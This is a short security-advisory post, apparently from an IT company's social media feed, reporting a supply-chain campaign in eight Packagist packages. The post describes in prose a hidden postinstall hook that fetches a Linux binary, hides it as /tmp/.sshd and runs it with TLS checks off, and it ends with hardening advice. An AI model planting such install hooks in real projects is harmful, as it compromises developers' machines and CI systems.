VMTech
+381 11 4150 20024/7 Discuss a project
← All Instagram insights VMTECH · INSTAGRAM

Packagist: malicious Linux binary in 8 packages via package.json

Packagist: вредоносный Linux‑бинарь в 8 пакетах через package.json

Colleagues, please note: a cybersecurity campaign was found affecting eight packages on Packagist.

Socket reports that a postinstall was added to package.json which downloads a Linux binary from GitHub Releases, saves it to /tmp/.sshd, sets permissions and launches it in the background while disabling TLS verification. Infected versions have been removed.

The attack is cross-ecosystem: the payload appears across many repositories and workflows, enabling evasion of Composer-only scanners.

Why this matters: it can enable remote code execution during install or in CI.

Recommendations: inspect package.json, lifecycle scripts and workflows, pin versions and block postinstall.

How are you hardening your supply chain?

#cybersecurity #supplychain #DevSecOps #OpenSource

Latest comments

No comments yet.